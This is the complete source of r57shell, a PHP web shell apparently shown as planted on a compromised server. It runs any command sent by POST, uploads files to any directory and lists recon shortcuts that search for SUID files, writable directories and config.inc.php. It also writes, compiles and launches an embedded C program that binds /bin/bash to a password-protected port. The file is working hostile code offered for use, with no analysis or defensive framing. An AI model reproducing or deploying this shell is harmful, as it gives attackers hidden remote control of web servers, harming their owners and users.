Viewing file:  l10hc.php (10.72 KB) -rw-rw-r--
Select action/file-type:
 (+) |  (+) |  (+) | Code (+) | Session (+) |  (+) | SDB (+) |  (+) |  (+) |  (+) |  (+) |  (+) |
<?
$language='eng';
$lang=array(
'eng_text1' => 'Executed command',
'eng_text2' => 'Execute command on server',
'eng_text3' => ' Run command',
'eng_text4' => 'Work directory',
'eng_text5' => 'Upload files on server',
'eng_text6' => 'Local file',
'eng_text7' => 'Aliases',
'eng_text8' => 'Select alias',
'eng_butt1' => 'Execute',
'eng_butt2' => 'Upload',
'eng_text9' => 'Bind port to /bin/bash',
'eng_text10' => 'Port',
'eng_text11' => 'Password for access',
'eng_butt3' => 'Bind'
);
$aliases=array(
/* ����� �� ������� ���� ������ � suid ����� */
'find all suid files' => 'find / -type f -perm -04000 -ls',
/* ����� �� ������� ���� ������ � sgid ����� */
'find all sgid files' => 'find / -type f -perm -02000 -ls',
/* ����� �� ������� ������ config.inc.php */
'find config.inc.php files' => 'find / -type f -name config.inc.php',
/* ����� �� ������� ���� ���������� � ������ ��������� �� ������ ��� ���� */
'find writable directories and files' => 'find / -perm -2 -ls',
'----------------------------------------------------------------------------------------------------' => 'ls -la'
);
/* Port bind source */
$port_bind_bd_c="
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
int main(argc,argv)
int argc;
char **argv;
{
int sockfd, newfd;
char buf[30];
struct sockaddr_in remote;
if(argc < 3) usage(argv[0]);
if(fork() == 0) { // ���������� ����� �������
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[1]));
remote.sin_addr.s_addr = htonl(INADDR_ANY);
sockfd = socket(AF_INET,SOCK_STREAM,0);
if(!sockfd) perror(\"socket error\");
bind(sockfd, (struct sockaddr *)&remote, 0x10);
listen(sockfd, 5);
while(1)
{
newfd=accept(sockfd,0,0);
dup2(newfd,0);
dup2(newfd,1);
dup2(newfd,2);
write(newfd,\"Password:\",10);
read(newfd,buf,sizeof(buf));
if (!chpass(argv[2],buf))
system(\"echo welcome to r57 shell && /bin/bash -i\");
else
fprintf(stderr,\"Sorry\");
close(newfd);
}
}
}
int usage(char *progname)
{
fprintf(stderr,\"USAGE:%s <port num> <password>\\n\",progname);
exit(0);
}
int chpass(char *base, char *entered) {
int i;
for(i=0;i<strlen(entered);i++)
{
if(entered[i] == '\\n')
entered[i] = '\\0';
}
if (!strcmp(base,entered))
return 0;
}";
?>
<!-- ���������� ���� -->
<html>
<head>
<title>r57shell</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<STYLE>
tr {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
td {
BORDER-RIGHT: #aaaaaa 1px solid;
BORDER-TOP: #eeeeee 1px solid;
BORDER-LEFT: #eeeeee 1px solid;
BORDER-BOTTOM: #aaaaaa 1px solid;
}
table {
BORDER-RIGHT: #eeeeee 2px outset;
BORDER-TOP: #eeeeee 2px outset;
BORDER-LEFT: #eeeeee 2px outset;
BORDER-BOTTOM: #eeeeee 2px outset;
BACKGROUND-COLOR: #D4D0C8;
}
input {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
select {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: 8pt Verdana;
}
submit {
BORDER-RIGHT: buttonhighlight 2px outset;
BORDER-TOP: buttonhighlight 2px outset;
BORDER-LEFT: buttonhighlight 2px outset;
BORDER-BOTTOM: buttonhighlight 2px outset;
BACKGROUND-COLOR: #e4e0d8;
width: 30%;
}
textarea {
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #e4e0d8;
font: Fixedsys bold;
}
BODY {
margin-top: 1px;
margin-right: 1px;
margin-bottom: 1px;
margin-left: 1px;
}
A:link {COLOR:red; TEXT-DECORATION: none}
A:visited { COLOR:red; TEXT-DECORATION: none}
A:active {COLOR:red; TEXT-DECORATION: none}
A:hover {color:blue;TEXT-DECORATION: none}
</STYLE>
</head>
<body bgcolor="#e4e0d8">
<table width=100%cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<!-- logo -->
<font face=Verdana size=2>
<font face=Webdings size=6><b>!</b></font><b> r57shell uploaded by secre</b>
</font>
</td></tr><table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td align=right width=100>
<?
/* change dir */
if (($_POST['dir']!=="") AND ($_POST['dir'])) { chdir($_POST['dir']); }
/* display information */
echo "<font face=Verdana size=-2>";
echo "<font color=blue><b>uname -a : <br>id : <br>pwd : </b></font><br>";
echo "</td><td>";
echo "<font face=Verdana size=-2 color=red><b>";
echo " ".exec("uname -a")."<br>";
echo " ".exec("id")."<br>";
echo " ".exec("pwd")."";
echo "</b></font>";
echo "</font>";
?>
</td></tr></table>
<?
/* port bind */
if (($_POST['bind']) AND ($_POST['bind']=="bd.c") AND ($_POST['port']) AND ($_POST['bind_pass']))
{
$w_file=fopen("/tmp/bd.c","ab+") or exit();
fputs($w_file,$port_bind_bd_c);
fclose($w_file);
$blah=exec("gcc -o /tmp/bd /tmp/bd.c");
$bind_string="/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']."";
$blah=exec($bind_string);
$_POST['cmd']="ps -aux | grep bd";
}
?>
<?
/* alias execute */
if (($_POST['alias']) AND ($_POST['alias']!==""))
{
foreach ($aliases as $alias_name=>$alias_cmd) {
if ($_POST['alias'] == $alias_name) {$_POST['cmd']=$alias_cmd;}
}
}
?>
<?
/* file upload */
if (($HTTP_POST_FILES["userfile"]!=="") AND ($HTTP_POST_FILES["userfile"]))
{
copy($HTTP_POST_FILES["userfile"][tmp_name],
$_POST['dir']."/".$HTTP_POST_FILES["userfile"][name])
or print("<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><td><tr><font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES["userfile"][name]."</div></font></td></tr></table>");
}
?>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc>
<?
/* command execute */
if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="ls -la"; }
echo "<font face=Verdana size=-2>".$lang[$language._text1].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td>";
echo "<b>";
echo "<div align=center><textarea name=report cols=122 rows=15>";
echo "".passthru($_POST['cmd'])."";
echo "</textarea></div>";
echo "</b>";
?>
</td></tr></table>
<table width=100% heigth=0 cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text2]; ?> ::</div></b></font></td></tr>
<tr><td height=23>
<?
/* command execute form */
echo "<form name=command method=post>";
echo "<font face=Verdana size=-2>";
echo "<b> ".$lang[$language._text3]." <font face=Wingdings color=gray>�</font> </b>";
echo "<input type=text name=cmd size=85> <br>";
echo "<b> ".$lang[$language._text4]." <font face=Wingdings color=gray>�</font> </b>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=text name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=text name=dir size=85 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text5]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* file upload form */
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
echo "<font face=Verdana size=-2>";
echo "<b> ".$lang[$language._text6]." <font face=Wingdings color=gray>�</font> </b>";
echo "<input type=file name=userfile size=85> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=submit name=submit value=\" ".$lang[$language._butt2]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text7]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* aliases form */
echo "<form name=aliases method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b> ".$lang[$language._text8]." <font face=Wingdings color=gray>�</font> </b>";
echo "<select name=alias>";
foreach ($aliases as $alias_name=>$alias_cmd)
{
echo "<option>$alias_name</option>";
}
echo "</select>";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo " <input type=submit name=submit value=\" ".$lang[$language._butt1]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>
<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: <? echo $lang[$language._text9]; ?> ::</div></b></font></td></tr>
<tr><td>
<?
/* port bind form */
echo "<form name=bind method=POST>";
echo "<font face=Verdana size=-2>";
echo "<b> ".$lang[$language._text10]." <font face=Wingdings color=gray>�</font> </b>";
echo "<input type=text name=port size=15 value=11457> ";
echo "<b> ".$lang[$language._text11]." <font face=Wingdings color=gray>�</font> </b>";
echo "<input type=text name=bind_pass size=15 value=r57> ";
if ((!$_POST['dir']) OR ($_POST['dir']=="")) { echo "<input type=hidden name=dir size=85 value=".exec("pwd").">"; }
else { echo "<input type=hidden name=dir size=85 value=".$_POST['dir'].">"; }
echo "<input type=hidden name=bind size=1 value=bd.c>";
echo " <input type=submit name=submit value=\" ".$lang[$language._butt3]." \">";
echo "</font>";
echo "</form>";
?>
</td></tr></table>
<? /* -------------------------[ EOF ]------------------------- */ ?>
|